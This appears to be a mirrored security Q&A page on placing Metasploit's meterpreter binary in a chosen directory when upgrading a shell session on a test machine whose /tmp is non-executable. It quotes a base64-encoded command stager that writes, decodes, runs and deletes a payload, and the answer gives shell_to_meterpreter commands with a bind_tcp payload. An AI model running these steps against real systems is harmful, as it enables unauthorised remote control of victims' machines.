TransWikia.com

How to set where the meterpreter payload is placed on the victim machine in metasploit?

Information Security Asked by h f on February 5, 2021

Background

I am trying to achieve a meterpreter session on a test machine (the "victim") that I already have a shell session on. When I run the command sessions -u #, where # corresponds to the number of the shell session, I receive an error because metasploit tries to create and execute a payload on the victim in the /tmp directory, which is set to be non-executable. In other words, nothing can be executed from the /tmp directory on the victim machine.

Question

Is there a way for me to specify where this executable file is created and executed on the victim machine?

  • My goal is to achieve something like this:
    • Use the linux/x86/meterpreter/bind_tcp payload.
    • Instead of having the executable payload be placed in /tmp and called something random such as abc123, I would want to have the payload placed in a known location that allows execution such as /home/Bob.
    • The executable payload whose location we specified, /home/Bob/abc123, will then execute and start the meterpreter session.

Notes

  • I believe to do this it has something to do with modifying the "command stager". In the following link you can see this line:
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysHIABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/FgFBP.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/tDGmH' < '/tmp/FgFBP.b64' ; chmod +x '/tmp/tDGmH' ; '/tmp/tDGmH' ; rm -f '/tmp/tDGmH' ; rm -f '/tmp/FgFBP.b64'"]

One Answer

The sessions -u is actually a post/multi/manage/shell_to_meterpreter with predefined options. If you see the advanced options for that module (with show advanced), you should notice it has:

Name               Required   Description
----               --------   -----------
BOURNE_FILE        no         Remote filename to use for dropped binary
BOURNE_PATH        no         Remote path to drop binary
PAYLOAD_OVERRIDE   no         Define the payload to use

Therefore, what you are trying to do should be possible with:

use post/multi/manage/shell_to_meterpreter
set SESSION 2
set BOURNE_PATH /home/Bob
set PAYLOAD_OVERRIDE linux/x86/meterpreter/bind_tcp
run

Answered by Esa Jokinen on February 5, 2021

Add your own answers!

Ask a Question

Get help from others!

© 2024 TransWikia.com. All rights reserved. Sites we Love: PCI Database, UKBizDB, Menu Kuliner, Sharing RPP